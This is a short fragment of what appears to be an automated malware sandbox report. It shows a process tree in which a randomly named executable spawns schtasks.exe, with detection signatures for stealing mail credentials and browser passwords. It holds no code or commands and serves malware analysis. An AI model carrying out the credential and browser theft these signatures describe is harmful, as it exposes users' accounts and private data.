                    • Started: conhost.exe
                • wJFLKBSbTtvP.exe (child process)
                    • Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
                • schtasks.exe (from wJFLKBSbTtvP.exe)
                    • Started: conhost.exe

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.